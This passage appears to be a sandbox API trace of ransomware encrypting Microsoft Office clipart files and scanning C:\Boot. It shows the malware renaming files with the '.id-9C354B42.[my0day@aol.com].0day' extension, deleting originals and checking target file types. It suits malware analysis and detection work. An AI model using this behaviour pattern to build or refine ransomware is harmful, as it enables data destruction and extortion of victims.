Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63 [0057.302] lstrlenW (lpString=".jpg") returned 4 [0057.302] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.302] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.302] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0057.303] GetLastError () returned 0x0 [0057.303] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xbaaa, lpOverlapped=0x0) returned 1 [0057.305] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xbab0, lpOverlapped=0x0) returned 1 [0057.306] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.306] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.306] SetEndOfFile (hFile=0x15c) returned 1 [0057.307] CloseHandle (hObject=0x15c) returned 1 [0057.307] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.307] SetEndOfFile (hFile=0x230) returned 1 [0057.308] CloseHandle (hObject=0x230) returned 1 [0057.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.308] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 1 [0057.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0057.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0057.308] lstrlenW (lpString=".doc") returned 4 [0057.308] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.308] lstrlenW (lpString=".docx") returned 5 [0057.308] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.308] lstrlenW (lpString=".pdf") returned 4 [0057.308] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.308] lstrlenW (lpString=".xls") returned 4 [0057.308] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.309] lstrlenW (lpString=".xlsx") returned 5 [0057.309] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.309] lstrlenW (lpString=".ppt") returned 4 [0057.309] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0057.309] lstrlenW (lpString=".zip") returned 4 [0057.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.309] lstrlenW (lpString=".rar") returned 4 [0057.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.309] lstrlenW (lpString=".bz2") returned 4 [0057.309] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.309] lstrlenW (lpString=".7z") returned 3 [0057.309] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0057.309] lstrlenW (lpString=".dbf") returned 4 [0057.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0057.309] lstrlenW (lpString=".1cd") returned 4 [0057.309] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63 [0057.309] lstrlenW (lpString=".jpg") returned 4 [0057.309] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.309] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.309] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0057.310] GetLastError () returned 0x0 [0057.310] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x38cc, lpOverlapped=0x0) returned 1 [0057.427] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x38d0, lpOverlapped=0x0) returned 1 [0057.428] ReadFile (in: hFile=0x230, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.429] WriteFile (in: hFile=0x15c, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.429] SetEndOfFile (hFile=0x15c) returned 1 [0057.529] CloseHandle (hObject=0x15c) returned 1 [0057.529] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.529] SetEndOfFile (hFile=0x230) returned 1 [0057.530] CloseHandle (hObject=0x230) returned 1 [0057.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf")) returned 1 [0057.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0057.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0057.676] lstrlenW (lpString=".doc") returned 4 [0057.676] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.676] lstrlenW (lpString=".docx") returned 5 [0057.676] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.676] lstrlenW (lpString=".pdf") returned 4 [0057.676] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.676] lstrlenW (lpString=".xls") returned 4 [0057.676] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.676] lstrlenW (lpString=".xlsx") returned 5 [0057.676] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.676] lstrlenW (lpString=".ppt") returned 4 [0057.676] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0057.676] lstrlenW (lpString=".zip") returned 4 [0057.676] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.676] lstrlenW (lpString=".rar") returned 4 [0057.676] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.676] lstrlenW (lpString=".bz2") returned 4 [0057.676] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.676] lstrlenW (lpString=".7z") returned 3 [0057.676] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0057.676] lstrlenW (lpString=".dbf") returned 4 [0057.676] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0057.676] lstrlenW (lpString=".1cd") returned 4 [0057.676] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 63 [0057.677] lstrlenW (lpString=".jpg") returned 4 [0057.677] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.976] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.976] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0058.046] GetLastError () returned 0x0 [0058.046] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x2b32, lpOverlapped=0x0) returned 1 [0058.048] WriteFile (in: hFile=0x244, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x2b40, lpOverlapped=0x0) returned 1 [0058.049] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0058.049] WriteFile (in: hFile=0x244, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.049] SetEndOfFile (hFile=0x244) returned 1 [0058.049] CloseHandle (hObject=0x244) returned 1 [0058.049] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.049] SetEndOfFile (hFile=0x188) returned 1 [0058.050] CloseHandle (hObject=0x188) returned 1 [0058.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0058.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 1 [0058.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0058.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0058.051] lstrlenW (lpString=".doc") returned 4 [0058.051] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.051] lstrlenW (lpString=".docx") returned 5 [0058.051] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.051] lstrlenW (lpString=".pdf") returned 4 [0058.051] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.051] lstrlenW (lpString=".xls") returned 4 [0058.051] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.051] lstrlenW (lpString=".xlsx") returned 5 [0058.051] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.051] lstrlenW (lpString=".ppt") returned 4 [0058.051] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0058.051] lstrlenW (lpString=".zip") returned 4 [0058.051] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.051] lstrlenW (lpString=".rar") returned 4 [0058.051] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.051] lstrlenW (lpString=".bz2") returned 4 [0058.051] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.051] lstrlenW (lpString=".7z") returned 3 [0058.051] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0058.051] lstrlenW (lpString=".dbf") returned 4 [0058.051] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0058.051] lstrlenW (lpString=".1cd") returned 4 [0058.051] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0058.052] lstrlenW (lpString=".jpg") returned 4 [0058.052] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.052] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.052] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0058.052] GetLastError () returned 0x0 [0058.052] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x3f4, lpOverlapped=0x0) returned 1 [0058.066] WriteFile (in: hFile=0x244, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x400, lpOverlapped=0x0) returned 1 [0058.066] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0058.066] WriteFile (in: hFile=0x244, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.066] SetEndOfFile (hFile=0x244) returned 1 [0058.067] CloseHandle (hObject=0x244) returned 1 [0058.067] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.067] SetEndOfFile (hFile=0x188) returned 1 [0058.067] CloseHandle (hObject=0x188) returned 1 [0058.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0058.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf")) returned 1 [0058.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0058.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0058.068] lstrlenW (lpString=".doc") returned 4 [0058.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.068] lstrlenW (lpString=".docx") returned 5 [0058.068] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.068] lstrlenW (lpString=".pdf") returned 4 [0058.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.068] lstrlenW (lpString=".xls") returned 4 [0058.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.068] lstrlenW (lpString=".xlsx") returned 5 [0058.068] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.068] lstrlenW (lpString=".ppt") returned 4 [0058.068] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0058.068] lstrlenW (lpString=".zip") returned 4 [0058.068] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.068] lstrlenW (lpString=".rar") returned 4 [0058.068] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString=".bz2") returned 4 [0058.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString=".7z") returned 3 [0058.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0058.069] lstrlenW (lpString=".dbf") returned 4 [0058.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0058.069] lstrlenW (lpString=".1cd") returned 4 [0058.069] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0058.069] lstrlenW (lpString=".jpg") returned 4 [0058.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.070] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.070] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0058.070] GetLastError () returned 0x0 [0058.070] ReadFile (hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0) Thread: id = 10 os_tid = 0xaac [0032.543] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x68fc90 [0032.544] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x69fc98 [0032.544] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402a8 [0032.544] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x62a390 [0032.544] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402c0 [0032.544] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x3270020 [0032.544] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402d8 [0032.544] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6402d8, Size=0x20) returned 0x625d70 [0032.544] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6402d8 [0032.544] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6402d8, Size=0x20) returned 0x625c08 [0032.545] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.545] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.545] Wow64DisableWow64FsRedirection (in: OldValue=0x2b1ff58 | out: OldValue=0x2b1ff58*=0x0) returned 1 [0032.545] lstrlenW (lpString="kernel32.dll") returned 12 [0032.545] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d70 | out: hHeap=0x5f0000) returned 1 [0032.545] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.545] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625c08 | out: hHeap=0x5f0000) returned 1 [0032.545] Sleep (dwMilliseconds=0x64) [0032.737] Sleep (dwMilliseconds=0x64) [0033.041] lstrcmpiW (lpString1=".LOG", lpString2=".0day") returned 1 [0033.041] lstrlenW (lpString="BCD.LOG") returned 7 [0033.041] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.041] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.041] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.041] lstrlenW (lpString=".doc") returned 4 [0033.041] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0033.041] lstrlenW (lpString=".docx") returned 5 [0033.042] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0033.042] lstrlenW (lpString=".pdf") returned 4 [0033.042] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0033.042] lstrlenW (lpString=".xls") returned 4 [0033.042] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0033.042] lstrlenW (lpString=".xlsx") returned 5 [0033.042] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0033.042] lstrlenW (lpString=".ppt") returned 4 [0033.042] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0033.042] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.042] lstrlenW (lpString=".zip") returned 4 [0033.042] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0033.042] lstrlenW (lpString=".rar") returned 4 [0033.042] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0033.042] lstrlenW (lpString=".bz2") returned 4 [0033.042] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0033.042] lstrlenW (lpString=".7z") returned 3 [0033.042] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0033.042] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.042] lstrlenW (lpString=".dbf") returned 4 [0033.042] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0033.042] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.042] lstrlenW (lpString=".1cd") returned 4 [0033.042] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0033.042] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.042] lstrlenW (lpString=".jpg") returned 4 [0033.042] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0033.042] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.042] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.042] lstrlenW (lpString=".doc") returned 4 [0033.042] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0033.042] lstrlenW (lpString=".docx") returned 5 [0033.042] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0033.042] lstrlenW (lpString=".pdf") returned 4 [0033.043] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0033.043] lstrlenW (lpString=".xls") returned 4 [0033.043] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0033.043] lstrlenW (lpString=".xlsx") returned 5 [0033.043] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0033.043] lstrlenW (lpString=".ppt") returned 4 [0033.043] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0033.043] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.043] lstrlenW (lpString=".zip") returned 4 [0033.043] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0033.043] lstrlenW (lpString=".rar") returned 4 [0033.043] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0033.043] lstrlenW (lpString=".bz2") returned 4 [0033.043] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0033.043] lstrlenW (lpString=".7z") returned 3 [0033.043] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0033.043] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.043] lstrlenW (lpString=".dbf") returned 4 [0033.043] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0033.043] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.043] lstrlenW (lpString=".1cd") returned 4 [0033.043] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0033.043] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0033.043] lstrlenW (lpString=".jpg") returned 4 [0033.043] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0033.043] lstrcmpiW (lpString1=".DAT", lpString2=".0day") returned 1 [0033.043] 